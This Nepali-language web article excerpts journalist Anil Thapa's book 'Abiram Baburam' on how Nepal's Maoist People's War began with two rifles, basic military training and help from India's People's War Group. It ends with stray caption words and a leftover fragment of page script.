जनयुद्ध सुरु गर्दा माओवादीसँग दुईवटा थ्रीनट थ्री राइफल मात्र थिए । यिनै राइफलका आधारमा तत्कालनि १९ जनाको केन्द्रीय समितिका सबै सदस्यले फौजी तालिम लिएका थिए । गोरखाका खोपबहादुर कँडेलको घरमा उनीहरुले भूमिगत रुपमा फौजी तालिम लिए । भारतीय सेनाबाट अवकाश प्राप्त इन्द्रबहादुर गुरुङले सबै केन्द्रीय सदस्यलाई बन्दुक खोल्ने, सफा गर्ने, गोली हान्ने, बम बनाउनेलगायतका तालिम दिएका थिए । nandaaaa
दई राईफमध्ये एउटा पश्चिम र अर्को पूर्वका लागि भनेर बाँडियो । तर दुर्भाग्य ! पूर्वका लागि भनेर छुट्याइएको राइफल बिग्रेको परेछ । शीतलकुमारले (हरिबोल गजुरेल) ले राइफल नचलेपछि खोलामा फालिदिने भने । तर, नचल्ने भएपनि बोकेर जाऊँ भनेर पूर्वतिर जाँदा त्यही राइफ भिरेर हिँडेका थियौँ ।
माओवादीले युवाहरुलाई विशेष तालिम दिन थाल्यो । यसपछि घरेलु बन्दुक जम्मा गर्ने कामलाई प्राथमिकता दिइयो । त्यस बेला गाउँघरमा धेरैसँग भरुवा बन्दुक थिए । mahendra
आक्रमण तीव्र रुपमा अघि बढाउने थप सैन्य तालिमको आवश्यकता परेपछि माओवादीले दक्षिणी छिमेकी मुलुक भारतमा सङ्घर्षरत पिपुल्स वार ग्रुपसँग तालिम दिनका लागि आग्रह गर्यो । तालिमका लागि पश्चिमबाट नन्दकिशोर पुन (पासाङ) छानिए भने पूर्व (सिन्धुली) बाट महेन्द्र श्रेष्ठ । उनीहरु पिपुल्स वार ग्रुपसँग तीन महिना तालिम लिएर फर्किए । prac
सानोबाट ठूलोको तयार िवा युद्धबाट युद्ध नीति सिक्ने अन्तर्गत माओवादीले जनयुद्ध सञ्चालन गरको थियो । यही नीति अनुसार युद्ध अघि बढ्दै गयो । गाउँगाउँमा छरिएका प्रहरी चौकी हट्दै गए । फौजी बलले पुरानो सत्तालाई विस्थापन गर्ने र खाली भएको ठाउँमा नयाँ सत्ता निर्माण गर्ने माओवादी नीति थियो । यसै अनुसार जनसेना सेक्सनबाट प्लाटुन, कम्पनी, बटालियन ब्रिगेड हुँदै डिभिजनसम्म गठन विस्तार गरिएको थियो । (पत्रकार अनिल थापाले लेखेको पुस्तक ‘अविराम बाबुराम’बाट)d.getElementsByTagName(‘head’)[0].appendChild(s);